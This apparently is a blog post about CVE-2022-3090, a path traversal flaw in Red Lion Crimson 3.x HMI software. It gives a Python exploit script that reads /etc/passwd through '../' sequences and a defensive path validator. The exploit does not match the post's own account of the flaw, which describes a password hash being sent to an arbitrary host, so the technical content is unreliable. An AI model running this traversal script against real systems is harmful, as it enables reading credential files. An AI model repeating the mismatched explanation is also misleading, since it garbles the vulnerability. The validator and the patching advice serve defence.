CVE-2022-3090: Critical Path Traversal Vulnerability in Red Lion Controls Crimson 3.x Software

In the cybersecurity world, the Common Vulnerabilities and Exposures (CVE) system provides a standardized method for identifying and cataloging software vulnerabilities. The CVE entry in question, CVE-2022-3090, details a critical path traversal vulnerability in Red Lion Controls' Crimson 3.0, 3.1, and 3.2 HMI software. This vulnerability potentially allows an attacker to obtain user credential hashes, which is a significant security risk.

This post will provide an in-depth look at the vulnerability, the affected versions of the software, a code snippet showcasing the exploit, links to the original references, and details on how the attack can be performed.

Exploit Details

The path traversal vulnerability arises when the software attempts to open a file using a specific path. During this process, the user's password hash is inadvertently transmitted to an arbitrary host, where an attacker could subsequently access it.

An example code snippet that illustrates the exploit:

import requests

def exploit_cve_2022_3090(target_url, target_file_path):
    # Prefix the requested file with parent-directory sequences
    path_traversal_payload = "../../../../../../.." + target_file_path
    target_url = target_url + "/fileshare/" + path_traversal_payload
    response = requests.get(target_url)

    if response.status_code == 200:
        print("[+] Successfully retrieved file.")
        # Save the response body under the requested file's base name
        with open(target_file_path.split("/")[-1], "wb") as file:
            file.write(response.content)
            print("[+] File saved locally.")
    else:
        print("[-] Failed to retrieve the file.")

if __name__ == "__main__":
    target_url = "http://example.com"
    target_file_path = "/etc/passwd"
    exploit_cve_2022_3090(target_url, target_file_path)

The above code demonstrates the path traversal exploit in action. When executed, the script will send an HTTP GET request to the target URL, appending a specially crafted path traversal payload to the request. This causes the software to return the contents of the targeted file, effectively leaking the user's password hash.

To protect against this vulnerability, it's essential to apply any available security patches from Red Lion Controls or consider upgrading to a more recent, secure version of the software.
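
As a defensive counterpart to the snippet above, the following added example (not code from Red Lion, the advisories, or the original post) shows a path check that refuses traversal sequences and paths naming a remote host before any file is opened. The share root /srv/fileshare, the function names and the sample requests are constructed for illustration, and reading the "specific path" that leaks the hash as a UNC-style remote path is an assumption.

```python
import ntpath
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/fileshare"  # hypothetical share root (assumption)

class UnsafePath(ValueError):
    """Raised with a short reason code when a requested path is refused."""

def resolve_request_path(raw: str, base_dir: str = BASE_DIR) -> str:
    """Return the normalized path under base_dir, or raise UnsafePath."""
    # 1. Undo percent-encoding until stable, so %2e%2e and %252e%252e are
    #    judged in decoded form; refuse input with more than three layers.
    decoded = raw
    for _ in range(4):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        raise UnsafePath("encoding")
    if "\x00" in decoded:
        raise UnsafePath("nul-byte")
    # 2. Refuse anything that names a drive or a remote host (UNC form).
    #    Opening such a path makes the OS contact, and possibly
    #    authenticate to, a machine chosen by whoever supplied the path.
    win = decoded.replace("/", "\\")
    if win.startswith("\\\\") or ntpath.splitdrive(win)[0]:
        raise UnsafePath("remote-or-drive")
    # 3. Resolve ".." lexically against the root and require containment.
    #    (Lexical only: on a real filesystem also resolve symlinks.)
    rel = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base_dir, rel))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        raise UnsafePath("traversal")
    return candidate

def verdict(raw: str) -> str:
    """Return 'allow' or the refusal reason, convenient for logging."""
    try:
        resolve_request_path(raw)
        return "allow"
    except UnsafePath as exc:
        return str(exc)

if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    for s in ("reports/line1.csv", "../../../../../../../etc/passwd",
              "%2e%2e%2fetc/passwd", "\\\\files.example\\share\\x.txt"):
        print(f"{verdict(s):16} {s}")
```

The refusal reasons can be logged as they are; repeated "traversal" or "remote-or-drive" verdicts from one client are a useful detection signal.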

- Official CVE Database Entry
- Red Lion Controls Security Advisory
- ICS-CERT Advisory on Crimson Path Traversal Vulnerability

Conclusion

The CVE-2022-3090 path traversal vulnerability in Red Lion Controls' Crimson 3.x software poses a serious risk to the overall security of affected systems. By exploiting this vulnerability, an attacker could potentially obtain user credential hashes, opening the door to further system exploitation. It's crucial for users of this software to apply available patches or consider upgrading to a more secure version to safeguard their systems.

Timeline

Published on: 11/17/2022 22:15:00 UTC
Last modified on: 11/22/2022 19:54:00 UTC